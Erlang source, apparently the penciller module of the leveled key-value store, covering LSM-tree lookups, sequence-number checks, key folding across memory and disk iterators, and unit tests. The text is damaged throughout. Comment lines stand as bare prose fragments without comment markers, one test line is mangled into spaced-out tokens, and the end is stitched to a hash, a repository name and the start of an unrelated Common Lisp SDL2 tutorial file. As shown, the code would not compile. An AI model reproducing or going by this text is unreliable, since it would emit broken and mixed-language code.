timed_fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, Monitor) ->
SW0 = leveled_monitor:maybe_time(Monitor),
{R, Level} =
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun timed_sst_get/4),
{TS0, _SW1} = leveled_monitor:step_time(SW0),
maybelog_fetch_timing(Monitor, Level, TS0, R == not_present),
R.
-spec fetch_sqn(
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
leveled_pmanifest:manifest(),
list(),
leveled_pmem:index_array()) ->
not_present|leveled_codec:ledger_kv()|leveled_codec:ledger_sqn().
and if it is not found looking down level by level through the LSM tree .
fetch_sqn(Key, Hash, Manifest, L0Cache, L0Index) ->
R = fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun sst_getsqn/4),
element(1, R).
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, FetchFun) ->
PosList =
case L0Index of
none ->
lists:seq(1, length(L0Cache));
_ ->
leveled_pmem:check_index(Hash, L0Index)
end,
L0Check = leveled_pmem:check_levelzero(Key, Hash, PosList, L0Cache),
case L0Check of
{false, not_found} ->
fetch(Key, Hash, Manifest, 0, FetchFun);
{true, KV} ->
{KV, memory}
end.
-spec fetch(tuple(), {integer(), integer()},
leveled_pmanifest:manifest(), integer(),
sst_fetchfun()) -> {tuple()|not_present, integer()|basement}.
Fetch from the persisted portion of the LSM tree , checking each level in
fetch(_Key, _Hash, _Manifest, ?MAX_LEVELS + 1, _FetchFun) ->
{not_present, basement};
fetch(Key, Hash, Manifest, Level, FetchFun) ->
case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
false ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun);
FP ->
case leveled_pmanifest:check_bloom(Manifest, FP, Hash) of
true ->
case FetchFun(FP, Key, Hash, Level) of
not_present ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun);
ObjectFound ->
{ObjectFound, Level}
end;
false ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun)
end
end.
timed_sst_get(PID, Key, Hash, Level) ->
SW = os:timestamp(),
R = leveled_sst:sst_get(PID, Key, Hash),
T0 = timer:now_diff(os:timestamp(), SW),
log_slowfetch(T0, R, PID, Level, ?SLOW_FETCH).
sst_getsqn(PID, Key, Hash, _Level) ->
leveled_sst:sst_getsqn(PID, Key, Hash).
log_slowfetch(T0, R, PID, Level, FetchTolerance) ->
case {T0, R} of
{T, R} when T < FetchTolerance ->
R;
{T, not_present} ->
leveled_log:log(pc016, [PID, T, Level, not_present]),
not_present;
{T, R} ->
leveled_log:log(pc016, [PID, T, Level, found]),
R
end.
-spec compare_to_sqn(
leveled_codec:ledger_kv()|leveled_codec:sqn()|not_present,
integer()) -> sqn_check().
Check to see if the SQN in the penciller is after the SQN expected for an
compare_to_sqn(not_present, _SQN) ->
missing;
compare_to_sqn(ObjSQN, SQN) when is_integer(ObjSQN), ObjSQN > SQN ->
replaced;
compare_to_sqn(ObjSQN, _SQN) when is_integer(ObjSQN) ->
Normally we would expect the SQN to be equal here , but
this also allows for the Journal to have a more advanced
current;
compare_to_sqn(Obj, SQN) ->
compare_to_sqn(leveled_codec:strip_to_seqonly(Obj), SQN).
-spec keyfolder(list(), list(), tuple(), tuple(),
{pclacc_fun(), any(), pos_integer()}) -> any().
A Segment List and a MaxKeys may be passed . Every time something is added
to the accumulator MaxKeys is reduced - so set MaxKeys to -1 if it is
The basic principle is to take the next key in the IMMiter and compare it
to the next key in the SSTiter , and decide which one should be added to the
keyfolder(IMMiter, SSTiter, StartKey, EndKey, {AccFun, Acc, Now}) ->
keyfolder({IMMiter, SSTiter},
{StartKey, EndKey},
{AccFun, Acc, Now},
{false, {0, infinity}, -1}).
keyfolder(_Iterators,
_KeyRange,
{_AccFun, Acc, _Now},
{_SegmentList, _LastModRange, MaxKeys}) when MaxKeys == 0 ->
{0, Acc};
keyfolder({[], SSTiter}, KeyRange, {AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys}) ->
{StartKey, EndKey} = KeyRange,
case find_nextkey(SSTiter, StartKey, EndKey,
SegmentList, element(1, LastModRange)) of
no_more_keys ->
case MaxKeys > 0 of
true ->
{MaxKeys, Acc};
false ->
This query started with a MaxKeys set to -1 . Query is
not interested in having MaxKeys in Response
Acc
end;
{NxSSTiter, {SSTKey, SSTVal}} ->
{Acc1, MK1} =
maybe_accumulate(SSTKey, SSTVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({[], NxSSTiter},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1})
end;
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator], SSTiterator},
KeyRange,
{AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys}) ->
{StartKey, EndKey} = KeyRange,
case {IMMKey < StartKey, leveled_codec:endkey_passed(EndKey, IMMKey)} of
{false, true} ->
keyfolder({[], SSTiterator},
KeyRange,
{AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys});
{false, false} ->
case find_nextkey(SSTiterator, StartKey, EndKey,
SegmentList, element(1, LastModRange)) of
no_more_keys ->
in - memory KV as the next
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({NxIMMiterator,
[]},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
{NxSSTiterator, {SSTKey, SSTVal}} ->
next key between the two ( and handle two keys
case leveled_codec:key_dominates({IMMKey,
IMMVal},
{SSTKey,
SSTVal}) of
left_hand_first ->
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
Stow the previous best result away at Level -1
NewEntry = {-1, [{SSTKey, SSTVal}]},
keyfolder({NxIMMiterator,
lists:keystore(-1,
1,
NxSSTiterator,
NewEntry)},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
right_hand_first ->
{Acc1, MK1} =
maybe_accumulate(SSTKey, SSTVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator],
NxSSTiterator},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
left_hand_dominant ->
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
We can add to the accumulator here . As the SST
so there is no need to hold off until the IMMKey
is left hand first .
keyfolder({NxIMMiterator,
NxSSTiterator},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1})
end
end
end.
-spec maybe_accumulate(leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
{any(), pclacc_fun(), pos_integer()},
integer(),
{non_neg_integer(), non_neg_integer()|infinity})
-> any().
maybe_accumulate(LK, LV,
{Acc, AccFun, QueryStartTime},
MaxKeys,
{LowLastMod, HighLastMod}) ->
{_SQN, _SH, LMD} = leveled_codec:strip_to_indexdetails({LK, LV}),
RunAcc =
(LMD == undefined) or
((LMD >= LowLastMod) and (LMD =< HighLastMod)),
case RunAcc and leveled_codec:is_active(LK, LV, QueryStartTime) of
true ->
{AccFun(LK, LV, Acc), MaxKeys - 1};
false ->
{Acc, MaxKeys}
end.
-spec find_nextkey(iterator(),
leveled_codec:ledger_key(), leveled_codec:ledger_key()) ->
no_more_keys|{iterator(), leveled_codec:ledger_kv()}.
find_nextkey(QueryArray, StartKey, EndKey) ->
find_nextkey(QueryArray, StartKey, EndKey, false, 0).
find_nextkey(QueryArray, StartKey, EndKey, SegmentList, LowLastMod) ->
find_nextkey(QueryArray,
-1,
{null, null},
StartKey, EndKey,
SegmentList,
LowLastMod,
?ITERATOR_SCANWIDTH).
find_nextkey(_QueryArray, LCnt,
{null, null},
_StartKey, _EndKey,
_SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
no_more_keys;
find_nextkey(QueryArray, LCnt,
{BKL, BestKV},
_StartKey, _EndKey,
_SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
the array , and return that array along with the best key / sqn / status
{BKL, [BestKV|Tail]} = lists:keyfind(BKL, 1, QueryArray),
{lists:keyreplace(BKL, 1, QueryArray, {BKL, Tail}), BestKV};
find_nextkey(QueryArray, LCnt,
{BestKeyLevel, BestKV},
StartKey, EndKey,
SegList, LowLastMod, Width) ->
{NextKey, RestOfKeys} =
case lists:keyfind(LCnt, 1, QueryArray) of
false ->
{null, null};
{LCnt, []} ->
{null, null};
{LCnt, [NK|ROfKs]} ->
{NK, ROfKs}
end,
case {NextKey, BestKeyLevel, BestKV} of
{null, BKL, BKV} ->
find_nextkey(QueryArray,
LCnt + 1,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{next, Owner, _SK}, BKL, BKV} ->
The first key at this level is pointer to a file - need to query
Pointer = {next, Owner, StartKey, EndKey},
UpdList = leveled_sst:sst_expandpointer(Pointer,
RestOfKeys,
Width,
SegList,
LowLastMod),
NewEntry = {LCnt, UpdList},
Need to loop around at this level ( LCnt ) as we have not yet
find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
LCnt,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{pointer, SSTPid, Slot, PSK, PEK}, BKL, BKV} ->
The first key at this level is pointer within a file - need to
Pointer = {pointer, SSTPid, Slot, PSK, PEK},
UpdList = leveled_sst:sst_expandpointer(Pointer,
RestOfKeys,
Width,
SegList,
LowLastMod),
NewEntry = {LCnt, UpdList},
Need to loop around at this level ( LCnt ) as we have not yet
find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
LCnt,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, null, null} ->
find_nextkey(QueryArray,
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, _BKL, {BestKey, _BestVal}} when Key < BestKey ->
The QueryArray is not modified until we have checked all levels
find_nextkey(QueryArray,
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, BKL, {BestKey, BestVal}} when Key == BestKey ->
SQN = leveled_codec:strip_to_seqonly({Key, Val}),
BestSQN = leveled_codec:strip_to_seqonly({BestKey, BestVal}),
if
SQN =< BestSQN ->
NewQArray = lists:keyreplace(LCnt,
1,
QueryArray,
{LCnt, RestOfKeys}),
find_nextkey(NewQArray,
LCnt + 1,
{BKL, {BestKey, BestVal}},
StartKey, EndKey,
SegList, LowLastMod, Width);
SQN > BestSQN ->
a higher SQN than the best key , so we should use this as
OldBestEntry = lists:keyfind(BKL, 1, QueryArray),
{BKL, [{BestKey, BestVal}|BestTail]} = OldBestEntry,
find_nextkey(lists:keyreplace(BKL,
1,
QueryArray,
{BKL, BestTail}),
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width)
end;
{_, BKL, BKV} ->
find_nextkey(QueryArray,
LCnt + 1,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width)
end.
-spec maybelog_fetch_timing(
leveled_monitor:monitor(),
memory|leveled_pmanifest:lsm_level(),
leveled_monitor:timing(),
boolean()) -> ok.
maybelog_fetch_timing(_Monitor, _Level, no_timing, _NF) ->
ok;
maybelog_fetch_timing({Pid, _StatsFreq}, _Level, FetchTime, true) ->
leveled_monitor:add_stat(Pid, {pcl_fetch_update, not_found, FetchTime});
maybelog_fetch_timing({Pid, _StatsFreq}, Level, FetchTime, _NF) ->
leveled_monitor:add_stat(Pid, {pcl_fetch_update, Level, FetchTime}).
-ifdef(TEST).
generate_randomkeys({Count, StartSQN}) ->
generate_randomkeys(Count, StartSQN, []).
generate_randomkeys(0, _SQN, Acc) ->
lists:reverse(Acc);
generate_randomkeys(Count, SQN, Acc) ->
K = {o,
lists:concat(["Bucket", leveled_rand:uniform(1024)]),
lists:concat(["Key", leveled_rand:uniform(1024)]),
null},
RandKey = {K,
{SQN,
{active, infinity},
leveled_codec:segment_hash(K),
null}},
generate_randomkeys(Count - 1, SQN + 1, [RandKey|Acc]).
clean_testdir(RootPath) ->
clean_subdir(sst_rootpath(RootPath)),
clean_subdir(filename:join(RootPath, ?MANIFEST_FP)).
clean_subdir(DirPath) ->
case filelib:is_dir(DirPath) of
true ->
{ok, Files} = file:list_dir(DirPath),
lists:foreach(fun(FN) ->
File = filename:join(DirPath, FN),
ok = file:delete(File),
io:format("Success deleting ~s~n", [File])
end,
Files);
false ->
ok
end.
maybe_pause_push(PCL, KL) ->
T0 = [],
I0 = leveled_pmem:new_index(),
T1 = lists:foldl(fun({K, V}, {AccSL, AccIdx, MinSQN, MaxSQN}) ->
UpdSL = [{K, V}|AccSL],
SQN = leveled_codec:strip_to_seqonly({K, V}),
H = leveled_codec:segment_hash(K),
UpdIdx = leveled_pmem:prepare_for_index(AccIdx, H),
{UpdSL, UpdIdx, min(SQN, MinSQN), max(SQN, MaxSQN)}
end,
{T0, I0, infinity, 0},
KL),
SL = element(1, T1),
Tree = leveled_tree:from_orderedlist(lists:ukeysort(1, SL), ?CACHE_TYPE),
T2 = setelement(1, T1, Tree),
case pcl_pushmem(PCL, T2) of
returned ->
timer:sleep(50),
maybe_pause_push(PCL, KL);
ok ->
ok
end.
add_missing_hash({K, {SQN, ST, MD}}) ->
{K, {SQN, ST, leveled_codec:segment_hash(K), MD}}.
archive_files_test() ->
RootPath = "test/test_area/ledger",
SSTPath = sst_rootpath(RootPath),
ok = filelib:ensure_dir(SSTPath),
ok = file:write_file(SSTPath ++ "/test1.sst", "hello_world"),
ok = file:write_file(SSTPath ++ "/test2.sst", "hello_world"),
ok = file:write_file(SSTPath ++ "/test3.bob", "hello_world"),
UsedFiles = ["./test1.sst"],
ok = archive_files(RootPath, UsedFiles),
{ok, AllFiles} = file:list_dir(SSTPath),
?assertMatch(true, lists:member("test1.sst", AllFiles)),
?assertMatch(false, lists:member("test2.sst", AllFiles)),
?assertMatch(true, lists:member("test3.bob", AllFiles)),
?assertMatch(true, lists:member("test2.bak", AllFiles)),
ok = clean_subdir(SSTPath).
shutdown_when_compact(Pid) ->
FoldFun =
fun(_I, Ready) ->
case Ready of
true ->
true;
false ->
timer:sleep(200),
not pcl_checkforwork(Pid)
end
end,
true = lists:foldl(FoldFun, false, lists:seq(1, 100)),
io:format("No outstanding compaction work for ~w~n", [Pid]),
pcl_close(Pid).
format_status_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCL} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
{status, PCL, {module, gen_server}, SItemL} = sys:get_status(PCL),
S = lists:keyfind(state, 1, lists:nth(5, SItemL)),
true = is_integer(array:size(element(2, S#state.manifest))),
ST = format_status(terminate, [dict:new(), S]),
?assertMatch(redacted, ST#state.manifest),
?assertMatch(redacted, ST#state.levelzero_cache),
?assertMatch(redacted, ST#state.levelzero_index),
?assertMatch(redacted, ST#state.levelzero_astree),
clean_testdir(RootPath).
simple_server_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCL} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
Key1_Pre = {{o,"Bucket0001", "Key0001", null},
{1, {active, infinity}, null}},
Key1 = add_missing_hash(Key1_Pre),
KL1 = generate_randomkeys({1000, 2}),
Key2_Pre = {{o,"Bucket0002", "Key0002", null},
{1002, {active, infinity}, null}},
Key2 = add_missing_hash(Key2_Pre),
KL2 = generate_randomkeys({900, 1003}),
Keep below the table size by having 900 not 1000
Key3_Pre = {{o,"Bucket0003", "Key0003", null},
{2003, {active, infinity}, null}},
Key3 = add_missing_hash(Key3_Pre),
KL3 = generate_randomkeys({1000, 2004}),
Key4_Pre = {{o,"Bucket0004", "Key0004", null},
{3004, {active, infinity}, null}},
Key4 = add_missing_hash(Key4_Pre),
KL4 = generate_randomkeys({1000, 3005}),
ok = maybe_pause_push(PCL, [Key1]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
ok = maybe_pause_push(PCL, KL1),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
ok = maybe_pause_push(PCL, [Key2]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
ok = maybe_pause_push(PCL, KL2),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
ok = maybe_pause_push(PCL, [Key3]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCL, {o,"Bucket0003", "Key0003", null})),
true = pcl_checkbloomtest(PCL, {o,"Bucket0001", "Key0001", null}),
true = pcl_checkbloomtest(PCL, {o,"Bucket0002", "Key0002", null}),
true = pcl_checkbloomtest(PCL, {o,"Bucket0003", "Key0003", null}),
false = pcl_checkbloomtest(PCL, {o,"Bucket9999", "Key9999", null}),
ok = shutdown_when_compact(PCL),
{ok, PCLr} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
?assertMatch(2003, pcl_getstartupsequencenumber(PCLr)),
ok = maybe_pause_push(PCLr , [ Key2 ] + + KL2 + + [ Key3 ] ) ,
true = pcl_checkbloomtest(PCLr, {o,"Bucket0001", "Key0001", null}),
true = pcl_checkbloomtest(PCLr, {o,"Bucket0002", "Key0002", null}),
true = pcl_checkbloomtest(PCLr, {o,"Bucket0003", "Key0003", null}),
false = pcl_checkbloomtest(PCLr, {o,"Bucket9999", "Key9999", null}),
?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
ok = maybe_pause_push(PCLr, KL3),
ok = maybe_pause_push(PCLr, [Key4]),
ok = maybe_pause_push(PCLr, KL4),
?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
?assertMatch(Key4, pcl_fetch(PCLr, {o,"Bucket0004", "Key0004", null})),
{ok, PclSnap, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
?assertMatch(Key1, pcl_fetch(PclSnap, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PclSnap, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PclSnap, {o,"Bucket0003", "Key0003", null})),
?assertMatch(Key4, pcl_fetch(PclSnap, {o,"Bucket0004", "Key0004", null})),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0001",
"Key0001",
null},
1)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0002",
"Key0002",
null},
1002)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0003",
"Key0003",
null},
2003)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0004",
"Key0004",
null},
3004)),
Key1A_Pre = {{o,"Bucket0001", "Key0001", null},
{4005, {active, infinity}, null}},
Key1A = add_missing_hash(Key1A_Pre),
KL1A = generate_randomkeys({2000, 4006}),
ok = maybe_pause_push(PCLr, [Key1A]),
ok = maybe_pause_push(PCLr, KL1A),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0001",
"Key0001",
null},
1)),
ok = pcl_close(PclSnap),
{ok, PclSnap2, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
?assertMatch(replaced, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0001",
"Key0001",
null},
1)),
?assertMatch(current, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0001",
"Key0001",
null},
4005)),
?assertMatch(current, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0002",
"Key0002",
null},
1002)),
ok = pcl_close(PclSnap2),
ok = pcl_close(PCLr),
clean_testdir(RootPath).
simple_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key2", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key2", null},
{2, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV3),
{Array5, KV4} = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{4, {active, infinity}, {0, 0}, null}},
KV4),
ER = find_nextkey(Array5,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
sqnoverlap_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{4, {active, infinity}, {0, 0}, null}},
KV3),
ER = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
sqnoverlap_otherway_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {1, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{2, {active, infinity}, {0, 0}, null}},
KV3),
ER = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
foldwithimm_simple_test() ->
Now = leveled_util:integer_now(),
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null},
{5, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key5", null},
{1, {active, infinity}, 0, null}}]},
{3, [{{o, "Bucket1", "Key3", null},
{3, {active, infinity}, 0, null}}]},
{5, [{{o, "Bucket1", "Key5", null},
{2, {active, infinity}, 0, null}}]}
],
KL1A = [{{o, "Bucket1", "Key6", null}, {7, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key1", null}, {8, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key8", null}, {9, {active, infinity}, 0, null}}],
IMM2 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1A), ?CACHE_TYPE),
IMMiter = leveled_tree:match_range({o, "Bucket1", "Key1", null},
{o, null, null, null},
IMM2),
AccFun = fun(K, V, Acc) -> SQN = leveled_codec:strip_to_seqonly({K, V}),
Acc ++ [{K, SQN}] end,
Acc = keyfolder(IMMiter,
QueryArray,
{o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key5", null}, 2},
{{o, "Bucket1", "Key6", null}, 7}], Acc),
IMMiterA = [{{o, "Bucket1", "Key1", null},
{8, {active, infinity}, 0, null}}],
AccA = keyfolder(IMMiterA,
QueryArray,
{o, "Bucket1", "Key1", null},
{o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key5", null}, 2}], AccA),
AddKV = {{o, "Bucket1", "Key4", null}, {10, {active, infinity}, 0, null}},
KL1B = [AddKV|KL1A],
IMM3 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1B), ?CACHE_TYPE),
IMMiterB = leveled_tree:match_range({o, "Bucket1", "Key1", null},
{o, null, null, null},
IMM3),
io:format("Compare IMM3 with QueryArrary~n"),
AccB = keyfolder(IMMiterB,
QueryArray,
{o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key4", null}, 10},
{{o, "Bucket1", "Key5", null}, 2},
{{o, "Bucket1", "Key6", null}, 7}], AccB).
create_file_test() ->
{RP, Filename} = {"test/test_area/", "new_file.sst"},
ok = file:write_file(filename:join(RP, Filename), term_to_binary("hello")),
KVL = lists:usort(generate_randomkeys({50000, 0})),
Tree = leveled_tree:from_orderedlist(KVL, ?CACHE_TYPE),
{ok, SP, noreply} =
leveled_sst:sst_newlevelzero(RP,
Filename,
1,
[Tree],
undefined,
50000,
#sst_options{press_method = native}),
{ok, SrcFN, StartKey, EndKey} = leveled_sst:sst_checkready(SP),
io:format("StartKey ~w EndKey ~w~n", [StartKey, EndKey]),
?assertMatch({o, _, _, _}, StartKey),
?assertMatch({o, _, _, _}, EndKey),
?assertMatch("./new_file.sst", SrcFN),
ok = leveled_sst:sst_clear(SP),
{ok, Bin} = file:read_file("test/test_area/new_file.sst.discarded"),
?assertMatch("hello", binary_to_term(Bin)).
slow_fetch_test() ->
?assertMatch(not_present, log_slowfetch(2, not_present, "fake", 0, 1)),
?assertMatch("value", log_slowfetch(2, "value", "fake", 0, 1)).
coverage_cheat_test() ->
{noreply, _State0} = handle_info(timeout, #state{}),
{ok, _State1} = code_change(null, #state{}, null).
handle_down_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCLr} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
FakeBookie = spawn(fun loop/0),
Mon = erlang:monitor(process, FakeBookie),
FakeBookie ! {snap, PCLr, self()},
{ok, PclSnap, null} =
receive
{FakeBookie, {ok, Snap, null}} ->
{ok, Snap, null}
end,
CheckSnapDiesFun =
fun(_X, IsDead) ->
case IsDead of
true ->
true;
false ->
case erlang:process_info(PclSnap) of
undefined ->
true;
_ ->
timer:sleep(100),
false
end
end
end,
?assertNot(lists:foldl(CheckSnapDiesFun, false, [1, 2])),
FakeBookie ! stop,
receive
{'DOWN', Mon, process, FakeBookie, normal} ->
ok
end,
?assert(lists:foldl(CheckSnapDiesFun, false, lists:seq(1, 10))),
pcl_close(PCLr),
clean_testdir(RootPath).
the fake bookie . Some calls to leveled_bookie ( like the two below )
calls ensures that the TEST controls the bookie 's Pid . The
FakeBookie .
loop() ->
receive
{snap, PCLr, TestPid} ->
{ok, Snap, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
TestPid ! {self(), {ok, Snap, null}},
loop();
stop ->
ok
end.
-endif.
|
11822951415820557e142cf6df49830b28be1ee96cdffd2795ac96c858b9be49 | TatriX/cl-sdl2-tutorial | 13-alpha-blending.lisp | (defpackage #:sdl2-tutorial-13-alpha-blending
(:use :cl)
(:export :run)
